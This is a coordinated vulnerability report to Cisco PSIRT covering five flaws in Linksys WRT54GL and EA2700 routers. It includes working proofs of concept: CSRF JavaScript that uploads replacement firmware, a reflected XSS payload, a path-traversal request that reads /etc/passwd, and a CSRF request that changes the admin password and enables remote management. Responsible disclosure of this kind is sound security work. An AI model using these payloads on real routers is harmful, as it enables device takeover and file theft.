# Linksys Router Vulnerabilites

Hello Cisco PSIRT,

I would like to report several vulnerabilities in Linksys network equipment. A public advisory regarding these issues may be released 30 days after sending this report. I'm more than happy to help you with testing or verifying these issues if you would like.

1. Linksys WRT54GL Firmware Upload CSRF Vulnerability
2. Linksys EA2700 XSS Vulnerability
3. Linksys EA2700 File Path Traversal Vulnerability
4. Linksys EA2700 Password Change Insufficient Authentication and CSRF Vulnerability
5. Linksys EA2700 Source Code Disclosure Vulnerability


## 1. Linksys WRT54GL Firmware Upload CSRF Vulnerability

### Vulnerable URL

http://192.168.1.1/upgrade.cgi

### Description

Lack of CSRF prevention on the upgrade firmware page could allow for a CSRF attack that replaces the router firmware.

### Proof of Concept
	<script>
	function fileUpload(url, fileData, fileName) {
	  var fileSize = fileData.length, boundary = "---------------------------168072824752491622650073", xhr = new XMLHttpRequest;
	  xhr.open("POST", url, true);
	  xhr.withCredentials = "true";
	  xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=" + boundary);
	  var body = boundary + "\r\n";
	  body += "Content-Disposition: form-data; name=\"submit_button\"; name=\"submit_button\" \r\n\r\nUpgrade\r\n";
	  body += boundary + "\r\nContent-Disposition: form-data; name=\"change_action\"\r\n\r\n\r\n";
	  body += boundary + "\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\n\r\n";
	  body += boundary + "\r\nContent-Disposition: form-data; name=\"file\"; filename=\"FW_WRT54GL_4.30.15.002_US_20101208_code.bin\"\r\n";
	  body += "Content-Type: application/macbinary\r\n";
	  body += "\r\n" + fileData + "\r\n\r\n";
	  body += boundary + "\r\nConntent-Disposition: form-data; name=\"process\"\r\n\r\n\r\n";
	  body += boundary + "--";
	  if(navigator.userAgent.toLowerCase().indexOf("chrome") > -1) {
	    XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
	      function byteValue(x) {
	        return x.charCodeAt(0) & 255
	      }
	      var ords = Array.prototype.map.call(datastr, byteValue);
	      var ui8a = new Uint8Array(ords);
	      this.send(ui8a.buffer)
	    }
	  }
	  xhr.sendAsBinary(body);
	  return true
	}
	fileUpload("http://192.167.0.1/upgrade.cgi", "W54G....", "myFile.gif");
	</script>

## 2. Linksys EA2700 XSS Vulnerability

### Vulnerable URL

http://192.168.1.1/apply.cgi

### Vulnerable Parameter

submit_button

### Description

Lack of proper parameter value sanitization can result in reflected Cross-Site Scripting (XSS) on the apply.cgi page.

### Proof of Concept

	REQUEST

	POST /apply.cgi HTTP/1.1
	Host: 192.168.1.1
	User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	Accept-Language: en-us,en;q=0.5
	Accept-Encoding: gzip, deflate
	Proxy-Connection: keep-alive
	Content-Type: application/x-www-form-urlencoded
	Content-Length: 47

	submit_button=xss'%3balert(1)//934&action=Apply

	RESPONSE

	HTTP/1.1 200 OK
	Content-Type: text/html;charset=utf-8
	Date: Wed, 29 Jun 2011 17:37:39 GMT
	Server: lighttpd/1.4.28
	Content-Length: 32467

	<!--
	//     Utopia_Init: SUCCEEDED (rc = 1)
	//     Utopia_GetDeviceSettings: SUCCEEDED (rc = 0)
	//          DEVICE SETTINGS:
	//          hostname = Cisco11159
	//          lang = en-US
	//          tz gmt offset = -8.000000
	//          auto_dst = 1
	//     Utopia_GetDeviceInfo: SUCCEEDED (rc = 0)
	//          DEVICE INFO:
	//          firmware version = 1.0.12
	//          firmware revision = 128947
	//          firmware build date = 2012-02-18 07:57
	//          model name = EA2700
	//          current time = Wed Jun 29 10:37:39 2011

	//          wan_mac_address = 20:aa:4b:76:9c:5b
	//          wan_domainname =
	//----------------------------------------------------------
	//     referrer page = xss';alert(1)//934.asp
	//     wait time = 0
	//     submit flag = 0
	-->



	<HTML dir="ltr">
	<head>
	[<meta http-equiv="expires" content="0">
	<meta http-equiv="cache-control" content="no-cache">
	<meta http-equiv="pragma" content="no-cache">

	<meta http-equiv="content-type" content="text/html;charset=utf-8" />
	<script type="text/javascript" charset="utf-8" src="/i18n/en_lang_pack.js"></script>
	<SCRIPT language=JavaScript>


	// *
	// * Copyright (C) 2010, Cisco Systems, Inc.
	// * All Rights Reserved.
	// *
	// * THIS SOFTWARE IS OFFERED "AS IS", AND CISCO GRANTS NO WARRANTIES OF ANY
	// * KIND, EXPRESS OR IMPLIED, BY STATUTE, COMMUNICATION OR OTHERWISE. CISCO
	// * SPECIFICALLY DISCLAIMS ANY IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS
	// * FOR A SPECIFIC PURPOSE OR NONINFRINGEMENT CONCERNING THIS SOFTWARE.
	// *

	[..SNIP..]

	<!-- Template error: Unable to open template file -->
	<!-- Template error: Unable to open template file -->
	<!-- Template error: Unable to open template file -->

	var submit_button = 'xss';alert(1)//934.asp';
	var wait_time = '0';
	var continue_button = 1;
	var t1 = new Date().getTime();

	[..SNIP..]

## 3. Linksys EA2700 File Path Traversal Vulnerability

### Vulnerable URL

http://192.168.1.1/apply.cgi

### Description

Inserting local system file paths in the "next_page" parameter results in the disclosure of files within the underlying filesystem.

### Proof of Concept

	REQUEST

	POST /apply.cgi HTTP/1.1Host: 192.168.1.1
	User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	Accept-Language: en-us,en;q=0.5
	Accept-Encoding: gzip, deflate
	Proxy-Connection: keep-alive
	Content-Type: application/x-www-form-urlencoded
	Content-Length: 75

	submit_button=Wireless_Basic&change_action=gozila_cgi&next_page=/etc/passwd

	RESPONSE
	
	HTTP/1.1 200 OK
	Content-Type: text/html;charset=utf-8
	Date: Wed, 29 Jun 2011 17:50:20 GMT
	Server: lighttpd/1.4.28
	Content-Length: 1850

	<!--
	//     Utopia_Init: SUCCEEDED (rc = 1)
	//     Utopia_GetDeviceSettings: SUCCEEDED (rc = 0)
	//          DEVICE SETTINGS:
	//          hostname = Cisco11159
	//          lang = en-US
	//          tz gmt offset = -8.000000
	//          auto_dst = 1
	//     Utopia_GetDeviceInfo: SUCCEEDED (rc = 0)
	//          DEVICE INFO:
	//          firmware version = 1.0.12
	//          firmware revision = 128947
	//          firmware build date = 2012-02-18 07:57
	//          model name = EA2700
	//          current time = Wed Jun 29 10:50:20 2011

	//          wan_mac_address = 20:aa:4b:76:9c:5b
	//          wan_domainname =
	//     Utopia_GetWifiRadioState[0]: SUCCEEDED (rc = 0)
	//          WIFI STATE (2.4 GHz): ENABLED
	//     Utopia_GetWifiRadioSettings[0]: SUCCEEDED (rc = 0)
	//          WIFI SETTINGS (2.4 GHz):
	//          interface = 0
	//          enabled = 1
	//          ssid broadcast = 1
	//          mac address = 20:aa:4b:76:9c:5c
	//          mode = 6
	//          band = 0
	//          channel = 0
	//     Utopia_GetWifiRadioState[1]: SUCCEEDED (rc = 0)
	//          WIFI STATE (5 GHz): ENABLED
	//     Utopia_GetWifiRadioSettings[1]: SUCCEEDED (rc = 0)
	//          WIFI SETTINGS (5 GHz):
	//          interface = 0
	//          enabled = 1
	//          ssid broadcast = 1
	//          mac address = 20:aa:4b:76:9c:5e
	//          mode = 7
	//          band = 0
	//          channel = 0
	//     Utopia_GetWifiSecuritySettings[0]: SUCCEEDED (rc = 0)
	//          wl0_sec_mode = 0
	//          wl0_key_renewal_interval = 0
	//          wl0_encrypt = 0
	//     Utopia_GetWifiSecuritySettings[1]: SUCCEEDED (rc = 0)
	//          wl1_sec_mode = 0
	//          wl1_key_renewal_interval = 0
	//     Utopia_GetWifiBridgeSettings: SUCCEEDED (rc = 0)
	//          WIFI BRIDGE SETTINGS:
	//          bridge mode = 0
	//          bridge ssid =
	//----------------------------------------------------------
	//     referrer page = Wireless_Basic.asp
	//     wait time = 0
	//     submit flag = 0
	-->
	root:x:0:0::/:/bin/sh
	nobody:x:99:99:Nobody:/:/bin/nologin
	sshd:x:22:22::/var/empty:/sbin/nologin
	admin:x:1000:1000:Admin User:/tmp/home/admin:/bin/sh
	quagga:x:1001:1001:Quagga:/var/empty:/bin/nologin
	firewall:x:1002:1002:Firewall:/var/empty:/bin/nologin


## 4. Linksys EA2700 Password Change Insufficient Authentication and CSRF Vulnerability

### Vulnerable URL

http://192.168.1.1/upgrade.cgi

### Description

Lack of proper access controls on the router web administration interface allow attackers on the same network to make changes to the device without authentiation. Attackers on the Internet can also take advantage of the lack of CSRF controls on the device to initiate a CSRF attack towards users on the proper network in order to make changes to the device. Vulnerable settings include: Changing the device password, enabling the remote management (WAN management), toggling UPnP  

### Proof of Concept

	CSRF to change the password and enable remote management
	
	REQUEST

	POST /apply.cgi HTTP/1.1Host: 192.168.1.1
	User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	Accept-Language: en-us,en;q=0.5
	Accept-Encoding: gzip, deflate
	Proxy-Connection: keep-alive
	Content-Type: application/x-www-form-urlencoded
	Content-Length: 370

	submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&http_passwd=password&http_passwdConfirm=password&_http_enable=1&web_wl_filter=0&remote_management=1&_remote_mgt_https=1&remote_ip_any=1&http_wanport=8080&nf_alg_sip=0&ctf_enable=1&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

## 5. Linksys Router Source Code Disclosure Vulnerability

### Vulnerable URL

http://192.168.1.1/Management.asp/

### Description

By adding a slash ("/") to the end of the URL path, the router returns the raw source code of the page